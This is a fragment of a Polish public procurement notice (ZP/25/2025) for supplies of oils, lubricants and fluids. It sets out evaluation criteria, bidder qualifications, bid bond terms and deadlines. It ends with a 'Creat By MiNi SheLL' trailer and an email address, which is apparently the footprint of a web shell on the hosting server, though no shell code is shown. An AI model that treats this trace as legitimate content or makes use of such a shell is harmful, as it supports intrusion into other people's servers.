class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający określa warunek udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej w zakresie Części I.<br/>1.1. Zamawiający nie określa warunku udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej w zakresie Części II i III.<br/>2. Zamawiający uzna wskazany w pkt. 1 warunek udziału za spełniony jeżeli Wykonawca wykaże, że:<br/>2.1. W okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał, <br/>a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje co najmniej 1 sukcesywną dostawę olejów do pojazdów, maszyn i urządzeń o wartości umowy co najmniej 100 000,00 zł netto, która była realizowana co najmniej 6 miesięcy.<br/>3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, z zastrzeżeniem, że warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa powyżej jest spełniony, przez co najmniej jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. jeśli spełnia warunek dotyczący zdolności technicznej lub zawodowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej w zakresie Części I, Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>1.1. wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Wzór wykazu dostaw stanowi Załącznik nr 6 do SWZ.<br/>2. W zakresie części II oraz III Zamawiający nie wymaga podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Zamawiający żąda przedłożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>1.1. Jeżeli Wykonawca oferuje produkty równoważne na potwierdzenie, iż oferowane przez niego produkty równoważne, spełniają wymagania określone przez Zamawiającego, zobowiązany jest załączyć do oferty (dla każdego produktu równoważnego) świadectwo jakości lub zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości lub inny dokument potwierdzający, że oferowany produkt równoważny odpowiada wymaganiom określonym dla rozwiązań równoważnych.<br/>2. Wykonawca składa przedmiotowe środki dowodowe wraz z ofertą – jeśli dotyczy.<br/>2.1. Złożone przedmiotowe środki dowodowe muszą jednoznacznie wskazywać, której pozycji z załącznika nr 2a/2b/2c do SWZ dotyczą (identyfikacja).<br/>2.2. W przypadku braku możliwości identyfikacji, Zamawiający uzna złożone przedmiotowe środki dowodowe za niekompletne.<br/>3. Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie.<br/>4. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>5. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Zamawiający żąda przedłożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>1.1. Jeżeli Wykonawca oferuje produkty równoważne na potwierdzenie, iż oferowane przez niego produkty równoważne, spełniają wymagania określone przez Zamawiającego, zobowiązany jest załączyć do oferty (dla każdego produktu równoważnego) świadectwo jakości lub zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości lub inny dokument potwierdzający, że oferowany produkt równoważny odpowiada wymaganiom określonym dla rozwiązań równoważnych.<br/>2. Wykonawca składa przedmiotowe środki dowodowe wraz z ofertą – jeśli dotyczy.<br/>2.1. Złożone przedmiotowe środki dowodowe muszą jednoznacznie wskazywać, której pozycji z załącznika nr 2a/2b/2c do SWZ dotyczą (identyfikacja).<br/>2.2. W przypadku braku możliwości identyfikacji, Zamawiający uzna złożone przedmiotowe środki dowodowe za niekompletne.<br/>3. Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie.<br/>4. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>5. Przedmiotowe środki dowodowe sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. W zakresie części I Zamawiający żąda od Wykonawcy(ców) wniesienia wadium w wysokości 3 000,00 zł (słownie złotych: trzy tysiące 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 pzp. <br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. <br/>4. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: pieniądzu, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2025 r. poz. 98). <br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: <br/>Bank Polska Kasa Opieki S. A. Grupa PeKaO I/Oddział Chełm nr 35 1240 2223 1111 0000 3576 9088<br/>Tytuł przelewu : „Wadium – Postępowanie pn. „Sukcesywna dostawa materiałów eksploatacyjnych tj. olejów, smarów, płynów, itp. z podziałem na części” lub/i nr ZP/25/2025.<br/>6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>8. Zasady zwrotu wadium zawarto w art. 98 pzp. <br/>9. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2–4 pzp, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli: <br/>9.1. Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust.2 pzpz lub art. 128 ust.1 pzp, <br/>z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych potwierdzających okoliczności, o którycwsph mowa w art. 57 pzp, oświadczenia, o którym mowa w art. 125 ust.1 pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa art. 223 ust.2 pkt 3 pzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej;<br/>9.2. Wykonawca, którego oferta została wybrana: <br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy (jeśli dotyczy). <br/>9.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana.<br/>10. W przypadku składania przez Wykonawcę wadium w innej dopuszczonej formie niż pieniężna dokument powinien być sporządzony zgodnie z obowiązującymi dla niego przepisami. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia z zastrzeżeniem, że warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w Rozdziale X pkt. 2.1. oraz w Rozdziale XIII pkt 3.1 jest spełniony, przez co najmniej jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. jeśli spełnia warunek dotyczący zdolności technicznej lub zawodowej – dot. Części I.<br/>1.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia – dot. Części II i III.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4. Przepisy pzp dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zawarto w Załączniku 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-16 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem Platformy pod adresem: https://mpgk-chelm.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-16 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin realizacji poszczególnego zamówienia wynosi do 10 dni roboczych od dnia wysłania zamówienia przez Zamawiającego- dotyczy części I, II oraz III.<br/>2. Zamawiający dopuszcza możliwość składania ofert częściowych zgodnie z podziałem na 3 części.<br/>2.1. Wykonawcy mogą złożyć ofertę na wybrane przez siebie części. Zamawiający nie ogranicza liczby części, na które może złożyć jeden Wykonawca.<br/>3. Postępowanie prowadzone jest w języku polskim. Wszystkie dokumenty lub oświadczenia składane przez Wykonawców sporządzone w języku obcym składane są wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. W razie wątpliwości uznaje się, iż wersja polskojęzyczna jest wersją wiążącą.<br/>4. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający wymaga wskazania w ofercie części zamówienia, której wykonanie powierzone zostanie podwykonawcom oraz podania nazw podwykonawców o ile są znane wraz z przedmiotem umów o podwykonawstwo, dla których są oni proponowani.<br/>5.Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w stosunku, do którego zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>6.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. <br/>7.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają dostawy, do realizacji których te zdolności są wymagane.<br/>8.Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (zgodnie z Załącznikiem nr 5 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.

Creat By MiNi SheLL
Email: jattceo@gmail.com